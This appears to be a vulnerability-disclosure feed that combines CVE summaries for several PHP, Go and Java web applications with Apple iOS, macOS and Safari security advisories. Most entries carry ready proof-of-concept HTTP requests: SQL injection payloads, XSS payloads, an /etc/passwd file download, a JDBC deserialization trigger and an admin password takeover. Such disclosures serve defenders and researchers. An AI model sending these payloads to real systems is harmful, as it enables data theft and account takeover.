A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.

**Purchase Order Management System v1.0 has SQL injection**

BUG\_Author:zito

Website source address:https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability File: /purchase\_order/admin/suppliers/view\_details.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x717273,(select (elt(333=333,1))),0x65666768,floor(rand(0)\*2))x from information\_schema.plugins group by x)a) and 'b'='b

    GET /purchase_order/admin/suppliers/view_details.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x717273,(select%20(elt(333=333,1))),0x65666768,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)%20and%20%27b%27=%27b HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=fd29fhrp156i09e1labjjoora0
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(10)))x) and 'c'='c

    GET /purchase_order/admin/suppliers/view_details.php?id=1%27%20and%20(select%201%20from%20(select(sleep(10)))x)%20and%20%27c%27=%27c HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=fd29fhrp156i09e1labjjoora0
    Connection: close
    

Server response time is 10 seconds

CVE-2023-2130: bug_report/SQLi.md at main · zitozito1/bug_report

go-bbs v1 was discovered to contain an arbitrary file download vulnerability via the component /api/v1/download.

**Install**

1.  Download: git clone https://github.com/gobbscom/go-bbs.git
2.  Create a directory: cd go-bbs && mkdir conf
3.  Copy the configuration file: cp app.conf.example conf/app.conf
4.  Modify the database configuration
5.  Execute ./go-bbs --install to install the database,
6.  Finally execute ./go-bbs to access the corresponding port

**Vulnerability Description AND recurrence**

View routing API routers/router.go line 196  

Follow up the &home.SingleController{} Download method, this interface needs to be logged in, and a user will be added by default through the global search Customer

    UserName: User
    PassWord: 123456
    

Check out router.go, follow up &home.LoginController{}, pass username and password to login  

    POST /login.html HTTP/1.1
    Host: 192.168.19.6:9090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 29
    
    username=user&password=123456
    

Credentials obtained: beegosessionID=***

The incoming URL needs to be AesDecrypt  

So you need to perform AesEncrypt on the downloaded path

    GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
    Host: 192.168.19.6:9090
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
    Connection: close
    
    
    

Use the credentials to access the downloaded API and successfully download /etc/passwd

CVE-2023-27755: go-bbs has an arbitrary file download vulnerability · Issue #10 · gobbscom/go-bbs

A vulnerability was found in EyouCms 1.5.4. It has been classified as problematic. Affected is an unknown function of the file login.php?m=admin&c=Arctype&a=edit of the component New Picture Handler. The manipulation of the argument litpic_loca leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225942 is the identifier assigned to this vulnerability.

Permalink

Cannot retrieve contributors at this time

eyoucms up to 1.6.2 'litpic\_loca' reflected xss vulnerability POC:

    POST /eyou/login.php?m=admin&c=Arctype&a=edit&lang=cn HTTP/1.1
    Host: 8.38.80.107
    Content-Length: 608
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://8.38.80.107
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://8.38.80.107/eyou/login.php?m=admin&c=Arctype&a=edit&id=2&lang=cn
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: img_id_upload=; imgname_id_upload=; USER_NAME_COOKIE=admin; SID_1=4f30a293; home_lang=cn; admin_lang=cn; PHPSESSID=sll5gtvfio3b23536i6m0fecrg; referurl=http%3A%2F%2F8.38.80.107%2Feyou%2Findex.php%3Fm%3Duser%26c%3DUsers%26a%3Dinfo; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; ENV_IS_UPHTML=0; admin-treeClicked_All=0; admin-treeClicked=close; admin-arctreeClicked_All=0; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-1649642233=close; workspaceParam=index%7CArctype; admin-treeClicked-Arr=%5B1%2C2%5D; ENV_GOBACK_URL=%2Feyou%2Flogin.php%3Fm%3Dadmin%26c%3DProduct%26a%3Dindex%26typeid%3D3%26lang%3Dcn; ENV_LIST_URL=%2Feyou%2Flogin.php%3Fm%3Dadmin%26c%3DProduct%26a%3Dindex%26lang%3Dcn
    Connection: close
    
    typename=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&dirname=xinwendongtai&current_channel=1&parent_id=0&channeltype=1&diy_dirpath=%2Fxinwendongtai&dirpath=&is_hidden=0&is_part=0&typelink=&englist_name=News+%26+Trends&litpic_local=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&litpic_remote=&old_arcrank=0&typearcrank=0&templist=lists_article.htm&tempview=view_article.htm&rulelist=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2Flist_%7Btid%7D_%7Bpage%7D.html&ruleview=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2F%7Baid%7D.html&seo_title=&seo_keywords=&seo_description=&tab=1&id=2&grade=0&oldgrade=0&old_current_channel=1
    

Then when user edit it again, a xss will be triggered.

CVE-2023-2057: vul_report/XSS1.md at main · sleepyvv/vul_report

A vulnerability, which was classified as problematic, has been found in DataGear up to 4.5.1. Affected by this issue is some unknown functionality of the component JDBC Server Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225920. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Description： DataGear is an open source and free data visualization and analysis platform, free to create any data dashboard you want, and supports access to various data sources such as SQL, CSV, Excel, HTTP interface, and JSON. In Datagear 4.5.1 and earlier, an attacker can achieve jdbc deserialization attacks by uploading a vulnerable version of the mysql driver. After the upload is successful, an unauthenticated attacker can construct a malicious request to connect to a malicious JDBC server to trigger deserialization.

Version: datagear <= 4.5.1

Add:https://github.com/datageartech/datagear

Vulnerability recurrence:

1.login system. Upload the mysql driver with jdbc deserialization vulnerability version  

2.Make URLDNS deserialized data

3.Set up mysql\_fake server

4.Find the data source, select the driver we added, and fill in the payload that triggers the vulnerability(removing cookies can also trigger the vulnerability)

    POST /schema/testConnection HTTP/1.1
    Host: localhost:50401
    Content-Length: 639
    sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
    Accept: */*
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: http://localhost:50401
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:50401/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    {"id":"33141aada1873c584331","title":"test","url":"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","user":"root","password":"root","createUser":{"id":"admin","name":"admin","realName":"","email":"","admin":true,"anonymous":false,"createTime":"2023-04-01 18:15:08","nameLabel":"admin"},"createTime":"2023-04-01 18:23:50","driverEntity":{"id":"116f66f1e1873c530001","driverClassName":"com.mysql.cj.jdbc.Driver","displayName":"mysql-connector-java-8.0.12","displayText":"mysql-connector-java-8.0.12","displayDescMore":""},"properties":[],"dataPermission":99}
    

5.Connecting to a malicious JDBC server triggers deserialization

CVE-2023-2042: ForCVE/2023-0x06.md at main · yangyanglo/ForCVE

Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.

The value of the password request parameter is copied into the HTML document as plain text between tags. The payload uay4ws4m6g was submitted in the password parameter. This input was echoed unmodified in the application's response.

    POST /purchase_order/classes/Login.php?f=login HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
    Origin: http://localhost
    X-Requested-With: XMLHttpRequest
    Referer: http://localhost/purchase_order/admin/login.php
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 37
    
    username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g

CVE-2023-29623: CVE-nu11secur1ty/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected at main · nu11secur1ty/CVE-nu11secur1ty

Apple Security Advisory 2023-04-10-1 - iOS 15.7.5 and iPadOS 15.7.5 addresses code execution, out of bounds write, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-04-10-1 iOS 15.7.5 and iPadOS 15.7.5iOS 15.7.5 and iPadOS 15.7.5 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213723.IOSurfaceAcceleratorAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Air 2, iPad mini (4th generation), and iPodtouch (7th generation)Impact: An app may be able to execute arbitrary code with kernelprivileges. Apple is aware of a report that this issue may have beenactively exploited.Description: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2023-28206: Clément Lecigne of Google's Threat Analysis Group andDonncha Ó Cearbhaill of Amnesty International’s Security LabWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Air 2, iPad mini (4th generation), and iPodtouch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A use after free issue was addressed with improvedmemory management.WebKit Bugzilla: 254797CVE-2023-28205: Clément Lecigne of Google's Threat Analysis Group andDonncha Ó Cearbhaill of Amnesty International’s Security LabThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.7.5 and iPadOS 15.7.5".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQ0VJEACgkQ4RjMIDkeNxnSrA/9GfJGP3rEWjtK1bSWO5XgjPZIN8xZcYAT2zQCHNM/CREylHDWSoamyMsxsUFkc25u0ok7Ucoj5k+44WXT7bhRqK52H5PDP6b0n3KsUnhJo+up6+AlKgqgomWntzQyjYTe36nArMvHkMAy9car/kj0l6OBAFF2pVXSTU24ubQfYOtAppQp3JNU9UnqhJ/VrQCANwvjHIsdy+EximByL3+tdCTzRi1v5SC4ZntHP0vB66YwFgrkaxmWLa/EXrA9tgJr8YX6k7LUc0MMUJSkcMg7ydojFBeVgHCVdH2rJpL8w6eVrpW7MQ5wcp6XrDm23T1lckVT8WL+LL4414gBjkfOyjjntdllGiH5For84t76bUGYDs6pb69Ztv2uAMRRP8nJAgNpsP++EnEaI0U3jMoEbq0xCv64y/EenkZm3kuTwOeo7l5Q5WzTDJTsdqZMnP+tR7nhCu41UIKN8eOelp/BqRT/4wcT8fvTNLgg/oY6TUPHYydQO48+ZjiBaryn7oXcv+EaDdggkySniijiLI4Dol20J0SHUr6LHOM6AiiMWhz5ZeIawaLcLfw/oP5+U1tio3dPeeTCwjr9hY8BB/a2rPq6UkAuReAS3ZU+b1N5swaVRYaZb41bfW5rfI571XS42mjoCCGJP8TdXk8mWeZgdvAKdLCYbIW2taTPVRhtGwE==DG1t-----END PGP SIGNATURE-----

Apple Security Advisory 2023-04-10-1

Apple Security Advisory 2023-04-07-3 - Safari 16.4.1 addresses code execution and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-04-07-3 Safari 16.4.1Safari 16.4.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213722.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A use after free issue was addressed with improvedmemory management.WebKit Bugzilla: 254797CVE-2023-28205: Clément Lecigne of Google's Threat Analysis Group andDonncha Ó Cearbhaill of Amnesty International’s Security LabAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQwYrsACgkQ4RjMIDkeNxmEoQ/+OXkd6XLV13F3cbrkCvFEvHndBySG93Q5o5ys0ClKqEc94Nvt5YPWalwJugUlFAXBevTCHAND7pNNbrmYPFZY+8qrMyIU/fnhsVaCfH/o/raULxZwiE9ndskrkjToHzEdMPrdtuC08gDHmYtr2thCb3M0Fv1rRqgIZ2ES9UBrrQJgFisTgZMgkylP02gN+1Ifa9JEBe7QMyRDhoC2uUvrBZI+jZJItVdysi3O1zYkMd+5D1icpwIotP0PlCLsFUAaccNXNDtcMr/XdHAuF5dcdDj0Kylmg79zC1mz79VUch3TerWb6HunBUTONFVlzbQwqNx+Csf6bDSSx0nHuqGz6pEfR65bTbzSh01+Yqjd+uht0aZVbNlptus7LKyrusRBN7QxlvoBY5JR+/CbGy3Tunj0YJk8SLG/QFCEDugjucT9O9myohlKWf7Af+1j/M2f/YKmQCyvhfREFBee8jzWj8FLLV/a6tIfVWe/IcrLGZDP13Q3nl7Ky55YndfXpNvN4ElAbSOyop3KkrfN1TgCGjeWhP+M5dK4RS9KsC+LF3AsejnUzLcQt2qW0e3dRCiyrhAAB9nKTFYtaJGoD6+jaQiCq4qGlC9fL8QNC6NvvvBrko+jE7Ws38vzdog2MVasAb+2vENqBo7ZKrgS0W/bRHV2x/NRo0lrQfKYma1koc0==JOpa-----END PGP SIGNATURE-----

Apple Security Advisory 2023-04-07-3

Apple Security Advisory 2023-04-07-2 - macOS Ventura 13.3.1 addresses code execution, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-04-07-2 macOS Ventura 13.3.1

macOS Ventura 13.3.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213721.

IOSurfaceAccelerator  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-28206: Clément Lecigne of Google's Threat Analysis Group and  
Donncha Ó Cearbhaill of Amnesty International’s Security Lab

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 254797  
CVE-2023-28205: Clément Lecigne of Google's Threat Analysis Group and  
Donncha Ó Cearbhaill of Amnesty International’s Security Lab

macOS Ventura 13.3.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQwYrsACgkQ4RjMIDke  
Nxlhmw/9GYfPKf/wprkK1e3/sflihNqz+/qJioE7p9oNHSvPx1b5VT2ovKMOGtsD  
8AG9qzF9DsWbFFybg7gIPAjQdb8tAiipm1xJYvyqLUpD1bJFlMIB+mRqs2OFUSgF  
0p9huSBVOGasGjcHRq9g2016OJQBr/oAA3w86Re/6Q5ST2AQCc7Y3lPcebJ+2JTp  
jSU2zfnNWg3+mRL0VMleh/ZnY2+yGce7r+uaoYzDz7MULGN8/j9nYoFUbDEbgf/y  
CnCAlJdMFuW98z3Iv7U+oUP5iF2PCzIR5nfaHcoXVaZUd0H52RLyrVKvm0iV4viq  
16SNGc7hl+Si9HDsRFN+XVvQoT4r+k5yzT78Ss3iLXYyR5XOf3Xi8sZdK0eXkDmk  
Ynrv5Y+st1M550EPlAOhsO8GAAWTsHWHOxmw76DX6kbUBaEOyYMRrKhG/AYP5Djg  
ZJlIIHsdNw99wEMUVBHCXtnWEY0aO7zaHpEl5tIr6r5xJep/idO8DjD6KpxmLDT8  
ftqB/fUloaVhTht6WMYaupXn4sG/U0228v8inculiFAKWeJ9vxyWF1doEGQNErFj  
xEUSsV10u1BjXf52Wle777lbS0ro31nv2pRWVfaT8j3dpTCZvDvUVclK5AAUPlKR  
tffpSuN9DHiPEynRftyBmi431MfXLI1CgYAC0w/rRYQ/pzc9NeI=  
=nsPp  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-04-07-2

Apple Security Advisory 2023-04-07-1 - iOS 16.4.1 and iPadOS 16.4.1 addresses code execution, out of bounds write, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-04-07-1 iOS 16.4.1 and iPadOS 16.4.1iOS 16.4.1 and iPadOS 16.4.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213720.IOSurfaceAcceleratorAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivileges. Apple is aware of a report that this issue may have beenactively exploited.Description: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2023-28206: Clément Lecigne of Google's Threat Analysis Group andDonncha Ó Cearbhaill of Amnesty International’s Security LabWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A use after free issue was addressed with improvedmemory management.WebKit Bugzilla: 254797CVE-2023-28205: Clément Lecigne of Google's Threat Analysis Group andDonncha Ó Cearbhaill of Amnesty International’s Security LabThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.4.1 and iPadOS 16.4.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQwYroACgkQ4RjMIDkeNxk/Iw/9GD1PXcIq1OFLv/N8t8bEqTUhuDqbFdQ3NLcbzmSO+XnoueqvlYvXtJr/w0wv0yAo6lxkLODuI+kVX9hjbqHZzUezCkugzvz4TXWgmQI6V7+TKXC9KA7jGxH6ZUMf1a+u+0jkFRUEUsaUHxOvScSVAmw2hlJvIlnYyK/E6O5ZJrua1cBQ2pQX2hlDIYUJaNZy3E9MlSKzZclDIszckvO1yVkfEzOkdh8laZoHQ3zN+QfKXvb9IoMmO715gaNYHoO141d0RqL5nyegu4e5lYb951o0DGph2usCrCrpFD0sSquAKNriwV5tJ/DPlrStMnktYX8iogCBT/T2/AevAmrdPOil7A/2rX5pSNRifnYdAnku8FdF2zxqKdMRt10fwI4YOl2IADKz/khPtig5fcYIwcpkXgavQ0N738hg4ugF9K18S5IdY2RSTN1SQtfRjWKus6I7MgGtdIp7MW1koB/j0bF6b5Xw9GefweUzSNvn+EZT2jVLHfiD/ILkKph/QXeiQfe3VGHOs89mHY750QmuAiAT9v24IkCfni5uvrRmApJiBB8w8Hnhq1aJa+09fxiVfPwVTrKqauI5cL2p0D9iWcjlWC8W1rJR5gO2Ge8twfgbMVCXfXmD9WhEb5Z6vSNlpJLy7xXSJTn4fnJNNgJ46lmKeU+G5I2/8xP8VWrsPks==83T6-----END PGP SIGNATURE-----

Apple Security Advisory 2023-04-07-1

Bludit version 4.0.0-rc-2 suffers from an account takeover vulnerability due to an API key that can be abused to change the administrative password.

    ## Title: Bludit-4.0.0-rc-2 - Release candidate 2 Account takeover:API token vulnerability## Author: nu11secur1ty## Date: 04.11.2013## Vendor: https://www.bludit.com/## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit## Description:The already authenticated attacker can send a normal request to changehis password and then he can usethe same JSON `object` and the vulnerable `API token KEY` in the samerequest to change the admin account password.Then he can access the admin account and he can do very malicious stuff.STATUS: HIGH Vulnerability[+]Exploit:```PUTPUT /api/users/admin HTTP/1.1Host: 127.0.0.1:8000Content-Length: 138sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50Safari/537.36content-type: application/jsonAccept: */*Origin: http://127.0.0.1:8000Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8000/admin/edit-user/pwnedAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthuiConnection: close{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}```[+]Response:```HTTPHTTP/1.1 200 OKHost: 127.0.0.1:8000Date: Tue, 11 Apr 2023 08:33:51 GMTConnection: closeX-Powered-By: PHP/7.4.30Access-Control-Allow-Origin: *Content-Type: application/json{"status":"0","message":"User edited.","data":{"key":"admin"}}```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)## Proof and Exploit:[href](https://streamable.com/w3aa4d)## Time spend:00:57:00

Tag

#webkit